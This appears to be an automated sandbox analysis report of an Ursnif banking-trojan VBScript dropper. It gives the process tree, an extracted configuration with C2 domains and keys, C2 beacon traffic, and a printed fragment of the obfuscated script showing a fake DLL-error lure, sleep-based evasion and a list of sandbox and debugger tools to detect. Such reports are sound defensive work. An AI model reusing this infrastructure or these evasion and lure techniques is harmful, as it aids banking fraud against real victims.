Play interactive tour

Edit tour

Windows Analysis Report start[2021.09.09_15-26].vbs

Overview

General Information

Sample Name:	start[2021.09.09_15-26].vbs
Analysis ID:	481181
MD5:	3959f76d91c30f3c14916f80a6c4cf23
SHA1:	2c918bff7f9073762308af3876777afc8507e3a8
SHA256:	1d02060d7493d25e46e7cdf76fc05aa6c80493f40db75d48700f1eb17431191d
Infos:
Most interesting Screenshot:

Detection

Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Multi AV Scanner detection for submitted file

Benign windows process drops PE files

VBScript performs obfuscated calls to suspicious functions

Yara detected Ursnif

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Creates processes via WMI

Found API chain indicative of debugger detection

Found evasive API chain (may stop execution after checking system information)

Deletes itself after installation

Writes registry values via WMI

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Queries the installation date of Windows

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Drops files with a non-matching file extension (content does not match file extension)

AV process strings found (often used to terminate AV products)

Java / VBScript file with very long strings (likely obfuscated code)

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Found evasive API chain checking for process token information

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Launches processes in debugging mode, may be used to hinder debugging

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Dropped file seen in connection with other malware

Uses Microsoft's Enhanced Cryptographic Provider

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

System is w10x64

wscript.exe (PID: 3840 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\start[2021.09.09_15-26].vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)

WmiPrvSE.exe (PID: 1304 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: A782A4ED336750D10B3CAF776AFE8E70)

rundll32.exe (PID: 2396 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer MD5: 73C519F050C20580F8A62C849D49215A)

rundll32.exe (PID: 5236 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WmiPrvSE.exe (PID: 1848 cmdline: C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding MD5: 7AB59579BA91115872D6E51C54B9133B)

cleanup

Malware Configuration

Threatname: Ursnif

{"lang_id": "RU, CN", "RSA Public Key": "IAodzSkRRXZVbpA8JuABjuUBQvpHiTpdg9dOAQp7bBw4t0xkkPvGywDaeciS3HngU/RkNYsOricM2S0LVvdwWlSJ6FdKpFt6YFFWOrsBfCiNFCtU5v/Ohii1LI6H4/OB/132O4comC2he+ED1d47BeoZGdamjIEdPypU4ReJbSLrCxcRMW03mJzNzM22WWjes9V+fVfZ8lvnVONnlm+2SejHIEhpJMv4VzqUiuRgWDBCh1ovNzO3eDJUiuSU1jFcdmg2ywuZOyDLXh6uuRZonMVTxMoziZw6y80jGvuwDFFQy5TMx6xbKoXdqNSwE60TugFay/vbpOuG0fp4zORCVEe39fTGD2o0Gttx0E5BI4w=", "c2_domain": ["atl.bigbigpoppa.com", "pop.urlovedstuff.com"], "botnet": "2500", "server": "580", "serpent_key": "Do9L8DmcVMtyFi6j", "sleep_time": "5", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "1"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000017.00000003.607221952.00000000050C8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000017.00000003.607028050.00000000050C8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000017.00000003.606994412.00000000050C8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000017.00000003.607255595.00000000050C8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000017.00000003.607169997.00000000050C8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000017.00000003.607202425.00000000050C8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000017.00000003.607241313.00000000050C8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000017.00000003.607113605.00000000050C8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000017.00000002.735811134.00000000050C8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: rundll32.exe PID: 5236	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Click to see the 5 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000017.00000003.577173150.0000000000B30000.00000040.00000001.sdmp

Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "IAodzSkRRXZVbpA8JuABjuUBQvpHiTpdg9dOAQp7bBw4t0xkkPvGywDaeciS3HngU/RkNYsOricM2S0LVvdwWlSJ6FdKpFt6YFFWOrsBfCiNFCtU5v/Ohii1LI6H4/OB/132O4comC2he+ED1d47BeoZGdamjIEdPypU4ReJbSLrCxcRMW03mJzNzM22WWjes9V+fVfZ8lvnVONnlm+2SejHIEhpJMv4VzqUiuRgWDBCh1ovNzO3eDJUiuSU1jFcdmg2ywuZOyDLXh6uuRZonMVTxMoziZw6y80jGvuwDFFQy5TMx6xbKoXdqNSwE60TugFay/vbpOuG0fp4zORCVEe39fTGD2o0Gttx0E5BI4w=", "c2_domain": ["atl.bigbigpoppa.com", "pop.urlovedstuff.com"], "botnet": "2500", "server": "580", "serpent_key": "Do9L8DmcVMtyFi6j", "sleep_time": "5", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "1"}

Multi AV Scanner detection for submitted file

Show sources

Source: start[2021.09.09_15-26].vbs

Virustotal: Detection: 10%

Perma Link

Antivirus detection for URL or domain

Show sources

Source: http://atl.bigbigpoppa.com/	Avira URL Cloud: Label: malware
Source: http://pop.urlovedstuff.com/FYLjL0FWG/A8A_2FylIs_2BN6G7XZV/uXdtwH9ZjhHPJVfO4Ke/_2B2DA3Bxr3hT97jg6X5cf/HmT9c0wd9uTFE/mjIXEmZg/7w1x_2BJ7UrOUMBuwkzmQs_/2B_2B90mhB/GdhMF2xI5ZZQZOsRZ/w8ERaF_2FKjr/oJe_2BmPqxj/UioALST3UPW_2B/x25T0SA4ncGBrSmoWvhyD/GJA93v_2Bs5_2FOu/bRGYPwsER1HateV/PYXudbMJvsQ83oCtuH/3_2FsJC5W/WltZ3WhV77sZrxWGfR6s/bNzIeDiXMV8LnHFQlB1/BK37js8oH2L1YJRuiB3U5s/fOdLI1WLm_2Bt/WCukq3AFEXzr/kh2	Avira URL Cloud: Label: malware
Source: http://atl.bigbigpoppa.com/R4Q64ljn5F0AeB0LyB/NuqzcVKz_/2FKpDeUm0fBCI1AQABSO/SrwJzbiGX2y5piswKvk/JCT	Avira URL Cloud: Label: malware
Source: http://pop.bigbigpoppa.com/	Avira URL Cloud: Label: malware
Source: http://pop.urlovedstuff.com/FYLjL0FWG/A8A_2FylIs_2BN6G7XZV/uXdtwH9ZjhHPJVfO4Ke/_2B2DA3Bxr3hT97jg6X5c	Avira URL Cloud: Label: malware
Source: http://atl.bigbigpoppa.com/0su8VV6_2B3_2B/puf6UG3h9deC_2Ft6TxKM/_2FYbenbgPpDMagU/M3qvcdiaQn_2FfY/O5d	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Show sources

Source: pop.urlovedstuff.com	Virustotal: Detection: 8%			Perma Link
Source: atl.bigbigpoppa.com	Virustotal: Detection: 8%			Perma Link

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\fum.cpp

ReversingLabs: Detection: 13%

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 23_2_00C23276 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

23_2_00C23276

Source:

Binary string: c:\Led-Flower\Spell\cotton_point\please.pdb source: wscript.exe, 00000000.00000003.555373535.00000262C5114000.00000004.00000001.sdmp, rundll32.exe, 00000017.00000002.735989389.0000000070374000.00000002.00020000.sdmp, fum.cpp.0.dr

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 23_2_7034AC85 FindFirstFileExW,

23_2_7034AC85

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49789 -> 185.251.90.253:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49789 -> 185.251.90.253:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49790 -> 185.251.90.253:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49790 -> 185.251.90.253:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49791 -> 185.251.90.253:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49791 -> 185.251.90.253:80

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	Domain query: atl.bigbigpoppa.com
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 185.251.90.253 80	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Domain query: pop.urlovedstuff.com

Source: Joe Sandbox View

ASN Name: SPRINTHOSTRU SPRINTHOSTRU

Source: Joe Sandbox View

IP Address: 185.251.90.253 185.251.90.253

Source: global traffic	HTTP traffic detected: GET /R4Q64ljn5F0AeB0LyB/NuqzcVKz_/2FKpDeUm0fBCI1AQABSO/SrwJzbiGX2y5piswKvk/JCT7aFfMHddlV3_2FIkW8P/ayLC_2Bshelva/2X_2Bg56/7jrpWKChL2MGyrBCg5dLHkp/afoZMxsy1T/Wp7_2FPeXCx8Q_2BZ/qOUTFrHwatL_/2B9CZYfq_2B/hvctvVLoqJu_2B/vpIx1k_2FVAj6zT_2F3t3/6fHnbpgCWlIc40kF/GNgoS4_2BmIaDcC/8SXP0dHgwB95tBuoyP/x_2BcO7Jg/2OPTdoZOpI7RlGA8Y18Y/JYFZfFiYFwCa3nBrqzw/H_2B8_2FkkexIGmoFzmcpf/7smS06LtDXKEe/c HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
Source: global traffic	HTTP traffic detected: GET /FYLjL0FWG/A8A_2FylIs_2BN6G7XZV/uXdtwH9ZjhHPJVfO4Ke/_2B2DA3Bxr3hT97jg6X5cf/HmT9c0wd9uTFE/mjIXEmZg/7w1x_2BJ7UrOUMBuwkzmQs_/2B_2B90mhB/GdhMF2xI5ZZQZOsRZ/w8ERaF_2FKjr/oJe_2BmPqxj/UioALST3UPW_2B/x25T0SA4ncGBrSmoWvhyD/GJA93v_2Bs5_2FOu/bRGYPwsER1HateV/PYXudbMJvsQ83oCtuH/3_2FsJC5W/WltZ3WhV77sZrxWGfR6s/bNzIeDiXMV8LnHFQlB1/BK37js8oH2L1YJRuiB3U5s/fOdLI1WLm_2Bt/WCukq3AFEXzr/kh2 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: pop.urlovedstuff.com
Source: global traffic	HTTP traffic detected: GET /0su8VV6_2B3_2B/puf6UG3h9deC_2Ft6TxKM/_2FYbenbgPpDMagU/M3qvcdiaQn_2FfY/O5d7t6b51CsWR3vpDy/zU3pR9vjY/lPgvi3S86qplQEaQf_2B/jxDYlqt8BjtcOWY_2FN/ohwhXl17Lh66734_2Fqn_2/FgCM3Tnuck0nF/J0S1YKxS/oTav10uGKUAnWla7FsZqe_2/BIXpQqvfaR/nMso0hdyU8dnVmjyD/LLoIt20KVY7z/9GJ5tvt7Ozs/NXB1gCveQulFzL/ZrjIdUFvH1uWGi_2BuvX_/2BGZEq0uPSkXlrhP/QwzrBUc1U9Q1ZY4/HzIgE26R/E HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Sep 2021 11:52:04 GMTContent-Type: text/html; charset=utf-8Content-Length: 146Connection: closeVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Source: rundll32.exe, 00000017.00000002.732610833.000000000066A000.00000004.00000020.sdmp	String found in binary or memory: http://atl.bigbigpoppa.com/
Source: rundll32.exe, 00000017.00000002.733066508.00000000006D5000.00000004.00000001.sdmp	String found in binary or memory: http://atl.bigbigpoppa.com/0su8VV6_2B3_2B/puf6UG3h9deC_2Ft6TxKM/_2FYbenbgPpDMagU/M3qvcdiaQn_2FfY/O5d
Source: rundll32.exe, 00000017.00000003.651548557.00000000006CF000.00000004.00000001.sdmp	String found in binary or memory: http://atl.bigbigpoppa.com/R4Q64ljn5F0AeB0LyB/NuqzcVKz_/2FKpDeUm0fBCI1AQABSO/SrwJzbiGX2y5piswKvk/JCT
Source: rundll32.exe, 00000017.00000002.732610833.000000000066A000.00000004.00000020.sdmp	String found in binary or memory: http://pop.bigbigpoppa.com/
Source: rundll32.exe, 00000017.00000003.652840050.00000000006D5000.00000004.00000001.sdmp, rundll32.exe, 00000017.00000003.697690406.00000000006D5000.00000004.00000001.sdmp	String found in binary or memory: http://pop.urlovedstuff.com/FYLjL0FWG/A8A_2FylIs_2BN6G7XZV/uXdtwH9ZjhHPJVfO4Ke/_2B2DA3Bxr3hT97jg6X5c

Source: unknown

DNS traffic detected: queries for: atl.bigbigpoppa.com

Source: global traffic	HTTP traffic detected: GET /R4Q64ljn5F0AeB0LyB/NuqzcVKz_/2FKpDeUm0fBCI1AQABSO/SrwJzbiGX2y5piswKvk/JCT7aFfMHddlV3_2FIkW8P/ayLC_2Bshelva/2X_2Bg56/7jrpWKChL2MGyrBCg5dLHkp/afoZMxsy1T/Wp7_2FPeXCx8Q_2BZ/qOUTFrHwatL_/2B9CZYfq_2B/hvctvVLoqJu_2B/vpIx1k_2FVAj6zT_2F3t3/6fHnbpgCWlIc40kF/GNgoS4_2BmIaDcC/8SXP0dHgwB95tBuoyP/x_2BcO7Jg/2OPTdoZOpI7RlGA8Y18Y/JYFZfFiYFwCa3nBrqzw/H_2B8_2FkkexIGmoFzmcpf/7smS06LtDXKEe/c HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
Source: global traffic	HTTP traffic detected: GET /FYLjL0FWG/A8A_2FylIs_2BN6G7XZV/uXdtwH9ZjhHPJVfO4Ke/_2B2DA3Bxr3hT97jg6X5cf/HmT9c0wd9uTFE/mjIXEmZg/7w1x_2BJ7UrOUMBuwkzmQs_/2B_2B90mhB/GdhMF2xI5ZZQZOsRZ/w8ERaF_2FKjr/oJe_2BmPqxj/UioALST3UPW_2B/x25T0SA4ncGBrSmoWvhyD/GJA93v_2Bs5_2FOu/bRGYPwsER1HateV/PYXudbMJvsQ83oCtuH/3_2FsJC5W/WltZ3WhV77sZrxWGfR6s/bNzIeDiXMV8LnHFQlB1/BK37js8oH2L1YJRuiB3U5s/fOdLI1WLm_2Bt/WCukq3AFEXzr/kh2 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: pop.urlovedstuff.com
Source: global traffic	HTTP traffic detected: GET /0su8VV6_2B3_2B/puf6UG3h9deC_2Ft6TxKM/_2FYbenbgPpDMagU/M3qvcdiaQn_2FfY/O5d7t6b51CsWR3vpDy/zU3pR9vjY/lPgvi3S86qplQEaQf_2B/jxDYlqt8BjtcOWY_2FN/ohwhXl17Lh66734_2Fqn_2/FgCM3Tnuck0nF/J0S1YKxS/oTav10uGKUAnWla7FsZqe_2/BIXpQqvfaR/nMso0hdyU8dnVmjyD/LLoIt20KVY7z/9GJ5tvt7Ozs/NXB1gCveQulFzL/ZrjIdUFvH1uWGi_2BuvX_/2BGZEq0uPSkXlrhP/QwzrBUc1U9Q1ZY4/HzIgE26R/E HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000017.00000003.607221952.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.607028050.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.606994412.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.607255595.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.607169997.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.607202425.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.607241313.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.607113605.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.735811134.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5236, type: MEMORYSTR

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000017.00000003.607221952.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.607028050.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.606994412.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.607255595.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.607169997.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.607202425.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.607241313.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.607113605.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.735811134.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5236, type: MEMORYSTR

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 23_2_00C23276 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

23_2_00C23276

System Summary:

Writes registry values via WMI

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 23_2_70332274	23_2_70332274
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 23_2_00C2725F	23_2_00C2725F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 23_2_00C27E30	23_2_00C27E30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 23_2_00C21754	23_2_00C21754
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 23_2_7033F000	23_2_7033F000
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 23_2_70348AA5	23_2_70348AA5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 23_2_70354362	23_2_70354362
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 23_2_7034D536	23_2_7034D536
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 23_2_7033F500	23_2_7033F500
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 23_2_70350770	23_2_70350770

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 23_2_70331382 GetProcAddress,NtCreateSection,memset,	23_2_70331382
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 23_2_703314FE SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,	23_2_703314FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 23_2_70331B4A NtMapViewOfSection,	23_2_70331B4A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 23_2_70332495 NtQueryVirtualMemory,	23_2_70332495
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 23_2_00C240DC NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	23_2_00C240DC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 23_2_00C28055 NtQueryVirtualMemory,	23_2_00C28055

Source: start[2021.09.09_15-26].vbs

Initial sample: Strings found which are bigger than 50

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\fum.cpp 8C5BA29FBEEDF62234916D84F3A857A3B086871631FD87FABDFC0818CF049587

Source: start[2021.09.09_15-26].vbs

Virustotal: Detection: 10%

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\start[2021.09.09_15-26].vbs'
Source: unknown	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
Source: unknown	Process created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\adobe.url

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winVBS@7/2@4/1

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 23_2_00C22102 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

23_2_00C22102

Source: C:\Windows\System32\wbem\WmiPrvSE.exe

Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\start[2021.09.09_15-26].vbs'

Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: start[2021.09.09_15-26].vbs

Static file information: File size 1393062 > 1048576

Source:

Data Obfuscation:

VBScript performs obfuscated calls to suspicious functions

Show sources

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: WScript.Sleep Int((Theodosian-AFQ+1)*Rnd+AFQ)REM diary character casework. 6326440 Fayetteville flaxen Doolittle Ballard backpack Alcoa loyal offertory Nicaragua axe Toni End WithEAX = MsgBox("Cant start because MSVCR101.dll is missing from your computer. Try reinstalling the program to fix this problem.", vbSystemModal+vbCritical, "System Error")Gnk("DEBUG: F_MESSAGE - True")REM bow megabyte plenitude aspirate stationery. handicapper nit frozen restaurateur Tennessee Millikan hark limerick Macedon camel Brandon hereunto disquisition plasm anatomic End FunctionFunction yNzk()Gnk("DEBUG: FS_PROCESS - Start")REM emboss indigestion surly rebuttal Kaskaskia upslope lightface stimulus vintner tabernacle male shy inhibit bravado mozzarella otherwise Gnk("DEBUG: FS_PROCESSCOUNT - Start")on error resume nextDim Theodosian,AFQTheodosian=6000' elongate conjoin protactinium monocular warplane riot rubidium bebop skyward contributory metabole stepchild lenticular rich fleabane Frisian AFQ=3000Randomize' thieving Kurt sovereign Simpson, anthropomorphic rhombic Monica loan transpose larch least farmhouse mercuric, tabletop hoosegow highboy camelopard WScript.Sleep Int((Theodosian-AFQ+1)*Rnd+AFQ)yDVFproc = ((((42 + (-27.0)) + 343.0) - 276.0) + (-82.0))wSQ = Array("frida-winjector-helper-64.exe","frida-winjector-helper-32.exe","pythonw.exe","pyw.exe","cmdvirth.exe","alive.exe","filewatcherservice.exe","ngvmsvc.exe","sandboxierpcss.exe","analyzer.exe","fortitracer.exe","nsverctl.exe","sbiectrl.exe","angar2.exe","goatcasper.exe","ollydbg.exe","sbiesvc.exe","apimonitor.exe","GoatClientApp.exe","peid.exe","scanhost.exe","apispy.exe","hiew32.exe","perl.exe","scktool.exe","apispy32.exe","hookanaapp.exe","petools.exe","sdclt.exe","asura.exe","hookexplorer.exe","pexplorer.exe","sftdcc.exe","autorepgui.exe","httplog.exe","ping.exe","shutdownmon.exe","autoruns.exe","icesword.exe","pr0c3xp.exe","sniffhit.exe","autorunsc.exe","iclicker-release.exe",".exe","prince.exe","snoop.exe","autoscreenshotter.exe","idag.exe","procanalyzer.exe","spkrmon.exe","avctestsuite.exe","idag64.exe","processhacker.exe","sysanalyzer.exe","avz.exe","idaq.exe","processmemdump.exe","syser.exe","behaviordumper.exe","immunitydebugger.exe","procexp.exe","systemexplorer.exe","bindiff.exe","importrec.exe","procexp64.exe","systemexplorerservice.exe","BTPTrayIcon.exe","imul.exe","procmon.exe","sython.exe","capturebat.exe","Infoclient.exe","procmon64.exe","taskmgr.exe","cdb.exe","installrite.exe","python.exe","taslogin.exe","ipfs.exe","pythonw.exe","tcpdump.exe","clicksharelauncher.exe","iprosetmonitor.exe","qq.exe","tcpview.exe","closepopup.exe","iragent.